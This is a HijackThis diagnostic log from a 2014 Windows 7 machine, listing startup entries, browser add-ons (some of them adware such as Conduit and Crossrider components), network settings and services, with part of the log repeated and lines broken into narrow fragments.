[IFXSPMGT] "C:

\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\ifxspmgt.exe"

/NotifyLogon
O4 - HKLM\..\Run:

[QLBController] C:

\Program Files

(x86)\Hewlett-

Packard\HP Hotkey

Support

\QLBController.exe

/start
O4 - HKLM\..\Run:

[Adobe Acrobat

Speed Launcher]

"C:\Program Files

(x86)\Adobe\Acrobat

9.0\Acrobat

\Acrobat_sl.exe"
O4 - HKLM\..\Run:

[Acrobat Assistant

8.0] "C:\Program

Files (x86)\Adobe

\Acrobat

9.0\Acrobat

\Acrotray.exe"
O4 - HKLM\..\Run:

[Adobe ARM] "C:

\Program Files

(x86)\Common Files

\Adobe\ARM

\1.0\AdobeARM.exe"
O4 - HKLM\..\Run:

[StartCCC] "C:

\Program Files

(x86)\ATI

Technologies

\ATI.ACE\Core-

Static

\CLIStart.exe"

MSRun
O4 - HKLM\..\Run:

[AMD AVT] Cmd.exe

/c start "AMD

Accelerated Video

Transcoding device

initialization"

/min "C:\Program

Files (x86)\AMD

AVT\bin

\kdbsync.exe" aml
O4 - HKLM\..\Run:

[BCSSync] "C:

\Program Files

(x86)\Microsoft

Office

\Office14\BCSSync.e

xe" /DelayServices
O4 - HKLM\..\Run:

[APSDaemon] "C:

\Program Files

(x86)\Common Files

\Apple\Apple

Application

Support

\APSDaemon.exe"
O4 - HKLM\..\Run:

[Sophos AutoUpdate

Monitor] C:\Program

Files (x86)\Sophos

\AutoUpdate

\almon.exe
O4 - HKLM\..\Run:

[Cisco AnyConnect

Secure Mobility

Agent for Windows]

"C:\Program Files

(x86)\Cisco\Cisco

AnyConnect Secure

Mobility Client

\vpnui.exe" -

minimized
O4 - HKLM\..\Run:

[SunJavaUpdateSched

] "C:\Program Files

(x86)\Common Files

\Java\Java Update

\jusched.exe"
O4 - HKLM\..\Run:

[iTunesHelper] "C:

\Program Files

(x86)\iTunes

\iTunesHelper.exe"
O4 - HKLM\..\Run:

[DivXMediaServer]

C:\Program Files

(x86)\DivX\DivX

Media Server

\DivXMediaServer.ex

e
O4 - HKLM\..\Run:

[DivXUpdate] "C:

\Program Files

(x86)\DivX\DivX

Update

\DivXUpdate.exe"

/CHECKNOW
O4 - HKCU\..\Run:

[Spotify Web

Helper] "C:\Users

\adam.ransfield

\AppData\Roaming

\Spotify\Data

\SpotifyWebHelper.e

xe"
O4 - HKCU\..\Run:

[SDP] C:\Users

\adam.ransfield

\AppData\Local

\FilesFrog Update

Checker

\update_checker.exe

/auto
O4 - HKCU\..\Run:

[Skype] "C:\Program

Files (x86)\Skype

\Phone\Skype.exe"

/minimized /regrun
O4 - HKCU\..\Run:

[BackgroundContaine

r] "C:\Windows

\SysWOW64\Rundll32.

exe" "C:\Users

\adam.ransfield

\AppData\Local

\Conduit

\BackgroundContaine

r

\BackgroundContaine

r.dll",DllRun
O4 - HKCU\..\Run:

[FLV Player] C:

\Users

\adam.ransfield

\AppData\Local

\WebPlayer\FLV

Player

\WebPlayer.exe
O8 - Extra context

menu item: Append

Link Target to

Existing PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIEAppendSelLi

nks.html
O8 - Extra context

menu item: Append

to Existing PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIEAppend.html
O8 - Extra context

menu item: Convert

Link Target to

Adobe PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIECaptureSelL

inks.html
O8 - Extra context

menu item: Convert

to Adobe PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIECapture.htm

l
O8 - Extra context

menu item: E&xport

to Microsoft Excel

- res://C:

\PROGRA~2\MICROS~1\

Office14\EXCEL.EXE/

3000
O8 - Extra context

menu item: Se&nd to

OneNote - res://C:

\PROGRA~2\MICROS~1\

Office14\ONBttnIE.d

ll/105
O9 - Extra button:

Send to OneNote -

{2670000A-7350-

4f3c-8081-

5663EE0C6C49} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIE.

dll
O9 - Extra 'Tools'

menuitem: Se&nd to

OneNote -

{2670000A-7350-

4f3c-8081-

5663EE0C6C49} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIE.

dll
O9 - Extra button:

OneNote Lin&ked

Notes - {789FE86F-

6FC4-46A1-9849-

EDE0DB0C95CA} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIEL

inkedNotes.dll
O9 - Extra 'Tools'

menuitem: OneNote

Lin&ked Notes -

{789FE86F-6FC4-

46A1-9849-

EDE0DB0C95CA} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIEL

inkedNotes.dll
O9 - Extra button:

Skype Click to Call

- {898EA8C8-E7FF-

479B-8935-

AEC46303B9E5} - C:

\Program Files

(x86)\Skype

\Toolbars\Internet

Explorer

\SkypeIEPlugin.dll
O11 - Options

group:

[ACCELERATED_GRAPHI

CS] Accelerated

graphics
O16 - DPF:

{2AB1C516-D654-

4D3A-B3D6-

2185BBCEB409}

(Cisco Systems

WebVPN Relay

Loader) -

https://vpngw.itsny

c.us/+CSCOL

+/relayp.cab
O16 - DPF:

{538793D5-659C-

4639-A56C-

A179AD87ED44}

(Cisco AnyConnect

VPN Client Web

Control) -

https://vpngw.itsny

c.us/CACHE/stc/1/bi

naries/vpnweb.cab
O17 - HKLM\System

\CCS\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O17 - HKLM\System

\CCS\Services

\Tcpip\..

\{86A5CD3A-33D5-

413B-8DE1-

E619876E614E}:

NameServer =

202.180.64.10,202.1

80.64.11
O17 - HKLM\System

\CS1\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O17 - HKLM\System

\CS2\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O18 - Protocol:

oraclesv -

{5900DC32-96D2-

426B-9217-

84C06A0FC0B4} - C:

\Hyperion

\SmartView\Bin

\SVAPPH.dll
O18 - Protocol:

skype-ie-addon-data

- {91774881-D725-

4E58-B298-

07617B9B86A8} - C:

\Program Files

(x86)\Skype

\Toolbars\Internet

Explorer

\SkypeIEPlugin.dll
O18 - Protocol:

skype4com -

{FFC8B962-9B40-

4DFF-9458-

1830C7DD7F5D} - C:

\PROGRA~2\COMMON~1\

Skype\SKYPE4~1.DLL
O18 - Filter

hijack: text/xml -

{807573E5-5146-

11D5-A672-

00B0D022E945} - C:

\Program Files

(x86)\Common Files

\Microsoft Shared

\OFFICE14\MSOXMLMF.

DLL
O20 - AppInit_DLLs:

c:\progra~2\sophos

\sophos~1\sophos~1.

dll
O23 - Service:

Adobe Flash Player

Update Service

(AdobeFlashPlayerUp

dateSvc) - Adobe

Systems

Incorporated - C:

\Windows

\SysWOW64\Macromed

\Flash

\FlashPlayerUpdateS

ervice.exe
O23 - Service:

Andrea ST Filters

Service

(AESTFilters) -

Andrea Electronics

Corporation - C:

\Program Files\IDT

\WDM\AESTSr64.exe
O23 - Service:

Agere Modem Call

Progress Audio

(AgereModemAudio) -

LSI Corporation -

C:\Program Files

\LSI SoftModem

\agr64svc.exe
O23 - Service: @

%SystemRoot%

\system32\Alg.exe,-

112 (ALG) - Unknown

owner - C:\Windows

\System32\alg.exe

(file missing)
O23 - Service: AMD

External Events

Utility - Unknown

owner - C:\Windows

\system32\atiesrxx.

exe (file missing)
O23 - Service:

Apple Mobile Device

- Apple Inc. - C:

\Program Files

(x86)\Common Files

\Apple\Mobile

Device Support

\AppleMobileDeviceS

ervice.exe
O23 - Service:

Bonjour Service -

Apple Inc. - C:

\Program Files

\Bonjour

\mDNSResponder.exe
O23 - Service: @C:

\Program Files

\Hewlett-Packard\HP

ProtectTools

Security Manager

\Bin\DpHostW.exe,-

128 (DpHost) -

DigitalPersona,

Inc. - C:\Program

Files\Hewlett-

Packard\HP

ProtectTools

Security Manager

\Bin\DpHostW.exe
O23 - Service: @

%SystemRoot%

\system32\efssvc.dl

l,-100 (EFS) -

Unknown owner - C:

\Windows

\System32\lsass.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\fxsresm.d

ll,-118 (Fax) -

Unknown owner - C:

\Windows

\system32\fxssvc.ex

e (file missing)
O23 - Service:

FLEXnet Licensing

Service -

Macrovision Europe

Ltd. - C:\Program

Files (x86)\Common

Files\Macrovision

Shared\FLEXnet

Publisher

\FNPLicensingServic

e.exe
O23 - Service:

Google Update

Service (gupdate)

(gupdate) - Google

Inc. - C:\Program

Files (x86)\Google

\Update

\GoogleUpdate.exe
O23 - Service:

Google Update

Service (gupdatem)

(gupdatem) - Google

Inc. - C:\Program

Files (x86)\Google

\Update

\GoogleUpdate.exe
O23 - Service: HP

Quick

Synchronization

Service

(HPDrvMntSvc.exe) -

Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\Shared

\HPDrvMntSvc.exe
O23 - Service:

hpHotkeyMonitor -

Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\HP Hotkey

Support

\HPHotkeyMonitor.ex

e
O23 - Service: HP

Software Framework

Service (hpqwmiex)

- Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\Shared

\hpqWmiEx.exe
O23 - Service: HP

Service (hpsrv) -

Unknown owner - C:

\Windows

\system32\Hpservice

.exe (file missing)
O23 - Service: @

%SystemRoot%

\system32\ieetwcoll

ectorres.dll,-1000

(IEEtwCollectorServ

ice) - Unknown

owner - C:\Windows

\system32\IEEtwColl

ector.exe (file

missing)
O23 - Service:

Security Platform

Management Service

(IFXSpMgtSrv) -

Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\ifxspmgt.exe
O23 - Service:

Trusted Platform

Core Service

(IFXTCS) - Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\ifxtcs.exe
O23 - Service: iPod

Service - Apple

Inc. - C:\Program

Files\iPod\bin

\iPodService.exe
O23 - Service:

@keyiso.dll,-100

(KeyIso) - Unknown

owner - C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Intel(R) Management

and Security

Application Local

Management Service

(LMS) - Intel

Corporation - C:

\Program Files

(x86)\Intel\Intel

(R) Management

Engine Components

\LMS\LMS.exe
O23 - Service:

@comres.dll,-2797

(MSDTC) - Unknown

owner - C:\Windows

\System32\msdtc.exe

(file missing)
O23 - Service: @

%SystemRoot%

\System32\netlogon.

dll,-102 (Netlogon)

- Unknown owner -

C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

NitroPDFDriverCreat

orReadSpool9

(NitroDriverReadSpo

ol9) - Nitro PDF

Software - C:

\Program Files

\Common Files

\Nitro\Pro

\9.0\NitroPDFDriver

Service9x64.exe
O23 - Service:

Nalpeiron Licensing

Service (nlsX86cc)

- Nalpeiron Ltd. -

C:\Windows

\SysWOW64\NLSSRV32.

EXE
O23 - Service:

Personal Secure

Drive Service

(PersonalSecureDriv

eService) -

Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\IfxPsdSv.exe
O23 - Service: @

%systemroot%

\system32\psbase.dl

l,-300

(ProtectedStorage)

- Unknown owner -

C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\Locator.e

xe,-2 (RpcLocator)

- Unknown owner -

C:\Windows

\system32\locator.e

xe (file missing)
O23 - Service: @

%SystemRoot%

\system32\samsrv.dl

l,-1 (SamSs) -

Unknown owner - C:

\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Sophos Anti-Virus

status reporter

(SAVAdminService) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus

\SAVAdminService.ex

e
O23 - Service:

Sophos Anti-Virus

(SAVService) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus

\SavService.exe
O23 - Service:

Skype Updater

(SkypeUpdate) -

Skype Technologies

- C:\Program Files

(x86)\Skype

\Updater

\Updater.exe
O23 - Service: @

%SystemRoot%

\system32\snmptrap.

exe,-3 (SNMPTRAP) -

Unknown owner - C:

\Windows

\System32\snmptrap.

exe (file missing)
O23 - Service:

Sophos Agent -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Remote

Management System

\ManagementAgentNT.

exe
O23 - Service:

Sophos AutoUpdate

Service - Sophos

Limited - C:

\Program Files

(x86)\Sophos

\AutoUpdate

\ALsvc.exe
O23 - Service:

Sophos Message

Router - Sophos

Limited - C:

\Program Files

(x86)\Sophos\Remote

Management System

\RouterNT.exe
O23 - Service:

Sophos Web Control

Service - Sophos

Limited - C:

\Program Files

(x86)\Sophos\Sophos

Anti-Virus\Web

Control

\swc_service.exe
O23 - Service: @

%systemroot%

\system32\spoolsv.e

xe,-1 (Spooler) -

Unknown owner - C:

\Windows

\System32\spoolsv.e

xe (file missing)
O23 - Service: @

%SystemRoot%

\system32\sppsvc.ex

e,-101 (sppsvc) -

Unknown owner - C:

\Windows

\system32\sppsvc.ex

e (file missing)
O23 - Service: @

%SystemRoot%

\system32\stlang64.

dll,-10101 (STacSV)

- IDT, Inc. - C:

\Program Files\IDT

\WDM\STacSV64.exe
O23 - Service:

Sophos Web

Intelligence

Service

(swi_service) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus\Web

Intelligence

\swi_service.exe
O23 - Service:

Sophos Web

Intelligence Update

(swi_update_64) -

Sophos Limited -

C:\ProgramData

\Sophos\Web

Intelligence

\swi_update_64.exe
O23 - Service: Tor

Win32 Service (tor)

- Unknown owner -

C:\Program Files

(x86)\Tor\tor.exe
O23 - Service: @

%SystemRoot%

\system32\ui0detect

.exe,-101

(UI0Detect) -

Unknown owner - C:

\Windows

\system32\UI0Detect

.exe (file missing)
O23 - Service:

Intel(R) Management

and Security

Application User

Notification

Service (UNS) -

Intel Corporation -

C:\Program Files

(x86)\Intel\Intel

(R) Management

Engine Components

\UNS\UNS.exe
O23 - Service: @

%SystemRoot%

\system32\vaultsvc.

dll,-1003

(VaultSvc) -

Unknown owner - C:

\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Validity VCS

Fingerprint Service

(vcsFPService) -

Validity Sensors,

Inc. - C:\Windows

\system32\vcsFPServ

ice.exe
O23 - Service: @

%SystemRoot%

\system32\vds.exe,-

100 (vds) - Unknown

owner - C:\Windows

\System32\vds.exe

(file missing)
O23 - Service:

Cisco AnyConnect

Secure Mobility

Agent (vpnagent) -

Cisco Systems, Inc.

- C:\Program Files

(x86)\Cisco\Cisco

AnyConnect Secure

Mobility Client

\vpnagent.exe
O23 - Service: @

%systemroot%

\system32\vssvc.exe

,-102 (VSS) -

Unknown owner - C:

\Windows

\system32\vssvc.exe

(file missing)
O23 - Service: @

%SystemRoot%

\system32\Wat

\WatUX.exe,-601

(WatAdminSvc) -

Unknown owner - C:

\Windows

\system32\Wat

\WatAdminSvc.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\wbengine.

exe,-104 (wbengine)

- Unknown owner -

C:\Windows

\system32\wbengine.

exe (file missing)
O23 - Service:

Mobile Broadband

Service

(WMCoreService) -

Ericsson AB - C:

\Program Files

(x86)\Ericsson

\Mobile Broadband

Drivers\WMCore

\mini_WMCore.exe
O23 - Service: @

%Systemroot%

\system32\wbem

\wmiapsrv.exe,-110

(wmiApSrv) -

Unknown owner - C:

\Windows

\system32\wbem

\WmiApSrv.exe (file

missing)
O23 - Service: @

%PROGRAMFILES%

\Windows Media

Player

\wmpnetwk.exe,-101

(WMPNetworkSvc) -

Unknown owner - C:

\Program Files

(x86)\Windows Media

Player\wmpnetwk.exe

(file missing)

--
End of file - 18297

bytes

----------------------------------------------------------------

Logfile of Trend

Micro HijackThis

v2.0.4
Scan saved at

4:57:55 p.m., on

11/05/2014
Platform: Windows 7

SP1 (WinNT

6.00.3505)
MSIE: Internet

Explorer v11.0

(11.00.9600.17041)
Boot mode: Normal

Running processes:
C:\Windows

\SysWOW64\Rundll32.

exe
C:\Program Files

(x86)\Hewlett-

Packard\HP

ProtectTools

Security Manager

\Bin\DPAgent.exe
C:\Users

\adam.ransfield

\AppData\Roaming

\Spotify\Data

\SpotifyWebHelper.e

xe
C:\Users

\adam.ransfield

\AppData\Local

\FilesFrog Update

Checker

\update_checker.exe
C:\Program Files

(x86)\Skype\Phone

\Skype.exe
C:\Users

\adam.ransfield

\AppData\Local

\WebPlayer\FLV

Player

\WebPlayer.exe
C:\Program Files

(x86)\Renesas

Electronics\USB 3.0

Host Controller

Driver\Application

\nusb3mon.exe
C:\Program Files

(x86)\Adobe\Acrobat

9.0\Acrobat

\acrotray.exe
C:\Program Files

(x86)\Common Files

\Adobe\ARM

\1.0\AdobeARM.exe
C:\Program Files

(x86)\Sophos

\AutoUpdate

\ALMon.exe
C:\Program Files

(x86)\Cisco\Cisco

AnyConnect Secure

Mobility Client

\vpnui.exe
C:\Program Files

(x86)\Common Files

\Java\Java Update

\jusched.exe
C:\Program Files

(x86)\iTunes

\iTunesHelper.exe
C:\Program Files

(x86)\DivX\DivX

Update

\DivXUpdate.exe
C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\PSDrt.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Program Files

(x86)\Google

\Chrome

\Application

\chrome.exe
C:\Users

\adam.ransfield

\Downloads

\HijackThis.exe

R1 - HKCU\Software

\Microsoft\Internet

Explorer

\Main,Search Page =

http://go.microsoft

.com/fwlink/?

LinkId=54896
R0 - HKCU\Software

\Microsoft\Internet

Explorer\Main,Start

Page =

https://mail.google

.com/mail/?

shva=1#inbox
R1 - HKLM\Software

\Microsoft\Internet

Explorer

\Main,Default_Page_

URL =

http://go.microsoft

.com/fwlink/p/?

LinkId=255141
R1 - HKLM\Software

\Microsoft\Internet

Explorer

\Main,Default_Searc

h_URL =

http://go.microsoft

.com/fwlink/?

LinkId=54896
R1 - HKLM\Software

\Microsoft\Internet

Explorer

\Main,Search Page =

http://go.microsoft

.com/fwlink/?

LinkId=54896
R0 - HKLM\Software

\Microsoft\Internet

Explorer\Main,Start

Page =

http://go.microsoft

.com/fwlink/p/?

LinkId=255141
R0 - HKLM\Software

\Microsoft\Internet

Explorer

\Search,SearchAssis

tant =
R0 - HKLM\Software

\Microsoft\Internet

Explorer

\Search,CustomizeSe

arch =
R0 - HKLM\Software

\Microsoft\Internet

Explorer\Main,Local

Page = C:\Windows

\SysWOW64\blank.htm
R1 - HKCU\Software

\Microsoft\Windows

\CurrentVersion

\Internet

Settings,ProxyOverr

ide = *.local
R0 - HKCU\Software

\Microsoft\Internet

Explorer

\Toolbar,LinksFolde

rName =
R3 - URLSearchHook:

Vuze Remote Toolbar

- {ba14329e-9550-

4989-b3f2-

9732e92d17cc} - C:

\Program Files

(x86)\Vuze_Remote

\prxtbVuze.dll
F2 -

REG:system.ini:

UserInit=userinit.e

xe
O2 - BHO:

CrossriderApp005246

6 - {11111111-1111

-1111-1111-

110511241166} - C:

\Program Files

(x86)\FLV Player

Addon\FLV Player

Addon-bho.dll
O2 - BHO:

AcroIEHelperStub -

{18DF081C-E8AD-

4283-A596-

FA578C2EBDC3} - C:

\Program Files

(x86)\Common Files

\Adobe\Acrobat

\ActiveX

\AcroIEHelperShim.d

ll
O2 - BHO: Groove

GFS Browser Helper

- {72853161-30C5-

4D22-B7F9-

0BBC1D38A37E} - C:

\PROGRA~2\MICROS~1\

Office14\GROOVEEX.D

LL
O2 - BHO: Java(tm)

Plug-In SSV Helper

- {761497BB-D6F0-

462C-B6EB-

D4DAF1D92D43} - C:

\Program Files

(x86)\Java

\jre7\bin\ssv.dll
O2 - BHO: Adobe PDF

Conversion Toolbar

Helper - {AE7CD045

-E861-484f-8273-

0445EE161910} - C:

\Program Files

(x86)\Common Files

\Adobe\Acrobat

\ActiveX

\AcroIEFavClient.dl

l
O2 - BHO:

SkypeIEPluginBHO -

{AE805869-2E5C-

4ED4-8F7B-

F1F7851A4497} - C:

\Program Files

(x86)\Skype

\Toolbars\Internet

Explorer

\SkypeIEPlugin.dll
O2 - BHO:

URLRedirectionBHO -

{B4F3A835-0E21-

4959-BA22-

42B3008E02FF} - C:

\PROGRA~2\MICROS~1\

Office14\URLREDIR.D

LL
O2 - BHO: Vuze

Remote -

{ba14329e-9550-

4989-b3f2-

9732e92d17cc} - C:

\Program Files

(x86)\Vuze_Remote

\prxtbVuze.dll
O2 - BHO: Java(tm)

Plug-In 2 SSV

Helper - {DBC80044

-A445-435b-BC74-

9C25C1C588A9} - C:

\Program Files

(x86)\Java

\jre7\bin

\jp2ssv.dll
O2 - BHO:

SmartSelect -

{F4971EE7-DAA0-

4053-9964-

665D8EE6A077} - C:

\Program Files

(x86)\Common Files

\Adobe\Acrobat

\ActiveX

\AcroIEFavClient.dl

l
O3 - Toolbar: Adobe

PDF - {47833539-

D0C5-4125-9FA8-

0819E2EAAC93} - C:

\Program Files

(x86)\Common Files

\Adobe\Acrobat

\ActiveX

\AcroIEFavClient.dl

l
O3 - Toolbar: Vuze

Remote Toolbar -

{ba14329e-9550-

4989-b3f2-

9732e92d17cc} - C:

\Program Files

(x86)\Vuze_Remote

\prxtbVuze.dll
O4 - HKLM\..\Run:

[IMSS] "C:\Program

Files (x86)\Intel

\Intel(R)

Management Engine

Components\IMSS

\PIconStartup.exe"
O4 - HKLM\..\Run:

[NUSB3MON] "c:

\Program Files

(x86)\Renesas

Electronics\USB 3.0

Host Controller

Driver\Application

\nusb3mon.exe"
O4 - HKLM\..\Run:

[IFXSPMGT] "C:

\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\ifxspmgt.exe"

/NotifyLogon
O4 - HKLM\..\Run:

[QLBController] C:

\Program Files

(x86)\Hewlett-

Packard\HP Hotkey

Support

\QLBController.exe

/start
O4 - HKLM\..\Run:

[Adobe Acrobat

Speed Launcher]

"C:\Program Files

(x86)\Adobe\Acrobat

9.0\Acrobat

\Acrobat_sl.exe"
O4 - HKLM\..\Run:

[Acrobat Assistant

8.0] "C:\Program

Files (x86)\Adobe

\Acrobat

9.0\Acrobat

\Acrotray.exe"
O4 - HKLM\..\Run:

[Adobe ARM] "C:

\Program Files

(x86)\Common Files

\Adobe\ARM

\1.0\AdobeARM.exe"
O4 - HKLM\..\Run:

[StartCCC] "C:

\Program Files

(x86)\ATI

Technologies

\ATI.ACE\Core-

Static

\CLIStart.exe"

MSRun
O4 - HKLM\..\Run:

[AMD AVT] Cmd.exe

/c start "AMD

Accelerated Video

Transcoding device

initialization"

/min "C:\Program

Files (x86)\AMD

AVT\bin

\kdbsync.exe" aml
O4 - HKLM\..\Run:

[BCSSync] "C:

\Program Files

(x86)\Microsoft

Office

\Office14\BCSSync.e

xe" /DelayServices
O4 - HKLM\..\Run:

[APSDaemon] "C:

\Program Files

(x86)\Common Files

\Apple\Apple

Application

Support

\APSDaemon.exe"
O4 - HKLM\..\Run:

[Sophos AutoUpdate

Monitor] C:\Program

Files (x86)\Sophos

\AutoUpdate

\almon.exe
O4 - HKLM\..\Run:

[Cisco AnyConnect

Secure Mobility

Agent for Windows]

"C:\Program Files

(x86)\Cisco\Cisco

AnyConnect Secure

Mobility Client

\vpnui.exe" -

minimized
O4 - HKLM\..\Run:

[SunJavaUpdateSched

] "C:\Program Files

(x86)\Common Files

\Java\Java Update

\jusched.exe"
O4 - HKLM\..\Run:

[iTunesHelper] "C:

\Program Files

(x86)\iTunes

\iTunesHelper.exe"
O4 - HKLM\..\Run:

[DivXMediaServer]

C:\Program Files

(x86)\DivX\DivX

Media Server

\DivXMediaServer.ex

e
O4 - HKLM\..\Run:

[DivXUpdate] "C:

\Program Files

(x86)\DivX\DivX

Update

\DivXUpdate.exe"

/CHECKNOW
O4 - HKCU\..\Run:

[Spotify Web

Helper] "C:\Users

\adam.ransfield

\AppData\Roaming

\Spotify\Data

\SpotifyWebHelper.e

xe"
O4 - HKCU\..\Run:

[SDP] C:\Users

\adam.ransfield

\AppData\Local

\FilesFrog Update

Checker

\update_checker.exe

/auto
O4 - HKCU\..\Run:

[Skype] "C:\Program

Files (x86)\Skype

\Phone\Skype.exe"

/minimized /regrun
O4 - HKCU\..\Run:

[BackgroundContaine

r] "C:\Windows

\SysWOW64\Rundll32.

exe" "C:\Users

\adam.ransfield

\AppData\Local

\Conduit

\BackgroundContaine

r

\BackgroundContaine

r.dll",DllRun
O4 - HKCU\..\Run:

[FLV Player] C:

\Users

\adam.ransfield

\AppData\Local

\WebPlayer\FLV

Player

\WebPlayer.exe
O8 - Extra context

menu item: Append

Link Target to

Existing PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIEAppendSelLi

nks.html
O8 - Extra context

menu item: Append

to Existing PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIEAppend.html
O8 - Extra context

menu item: Convert

Link Target to

Adobe PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIECaptureSelL

inks.html
O8 - Extra context

menu item: Convert

to Adobe PDF -

res://C:\Program

Files (x86)\Common

Files\Adobe

\Acrobat\ActiveX

\AcroIEFavClient.dl

l/AcroIECapture.htm

l
O8 - Extra context

menu item: E&xport

to Microsoft Excel

- res://C:

\PROGRA~2\MICROS~1\

Office14\EXCEL.EXE/

3000
O8 - Extra context

menu item: Se&nd to

OneNote - res://C:

\PROGRA~2\MICROS~1\

Office14\ONBttnIE.d

ll/105
O9 - Extra button:

Send to OneNote -

{2670000A-7350-

4f3c-8081-

5663EE0C6C49} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIE.

dll
O9 - Extra 'Tools'

menuitem: Se&nd to

OneNote -

{2670000A-7350-

4f3c-8081-

5663EE0C6C49} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIE.

dll
O9 - Extra button:

OneNote Lin&ked

Notes - {789FE86F-

6FC4-46A1-9849-

EDE0DB0C95CA} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIEL

inkedNotes.dll
O9 - Extra 'Tools'

menuitem: OneNote

Lin&ked Notes -

{789FE86F-6FC4-

46A1-9849-

EDE0DB0C95CA} - C:

\Program Files

(x86)\Microsoft

Office

\Office14\ONBttnIEL

inkedNotes.dll
O9 - Extra button:

Skype Click to Call

- {898EA8C8-E7FF-

479B-8935-

AEC46303B9E5} - C:

\Program Files

(x86)\Skype

\Toolbars\Internet

Explorer

\SkypeIEPlugin.dll
O11 - Options

group:

[ACCELERATED_GRAPHI

CS] Accelerated

graphics
O16 - DPF:

{2AB1C516-D654-

4D3A-B3D6-

2185BBCEB409}

(Cisco Systems

WebVPN Relay

Loader) -

https://vpngw.itsny

c.us/+CSCOL

+/relayp.cab
O16 - DPF:

{538793D5-659C-

4639-A56C-

A179AD87ED44}

(Cisco AnyConnect

VPN Client Web

Control) -

https://vpngw.itsny

c.us/CACHE/stc/1/bi

naries/vpnweb.cab
O17 - HKLM\System

\CCS\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O17 - HKLM\System

\CCS\Services

\Tcpip\..

\{86A5CD3A-33D5-

413B-8DE1-

E619876E614E}:

NameServer =

202.180.64.10,202.1

80.64.11
O17 - HKLM\System

\CS1\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O17 - HKLM\System

\CS2\Services

\Tcpip\Parameters:

Domain =

shift.co.nz
O18 - Protocol:

oraclesv -

{5900DC32-96D2-

426B-9217-

84C06A0FC0B4} - C:

\Hyperion

\SmartView\Bin

\SVAPPH.dll
O18 - Protocol:

skype-ie-addon-data

- {91774881-D725-

4E58-B298-

07617B9B86A8} - C:

\Program Files

(x86)\Skype

\Toolbars\Internet

Explorer

\SkypeIEPlugin.dll
O18 - Protocol:

skype4com -

{FFC8B962-9B40-

4DFF-9458-

1830C7DD7F5D} - C:

\PROGRA~2\COMMON~1\

Skype\SKYPE4~1.DLL
O18 - Filter

hijack: text/xml -

{807573E5-5146-

11D5-A672-

00B0D022E945} - C:

\Program Files

(x86)\Common Files

\Microsoft Shared

\OFFICE14\MSOXMLMF.

DLL
O20 - AppInit_DLLs:

c:\progra~2\sophos

\sophos~1\sophos~1.

dll
O23 - Service:

Adobe Flash Player

Update Service

(AdobeFlashPlayerUp

dateSvc) - Adobe

Systems

Incorporated - C:

\Windows

\SysWOW64\Macromed

\Flash

\FlashPlayerUpdateS

ervice.exe
O23 - Service:

Andrea ST Filters

Service

(AESTFilters) -

Andrea Electronics

Corporation - C:

\Program Files\IDT

\WDM\AESTSr64.exe
O23 - Service:

Agere Modem Call

Progress Audio

(AgereModemAudio) -

LSI Corporation -

C:\Program Files

\LSI SoftModem

\agr64svc.exe
O23 - Service: @

%SystemRoot%

\system32\Alg.exe,-

112 (ALG) - Unknown

owner - C:\Windows

\System32\alg.exe

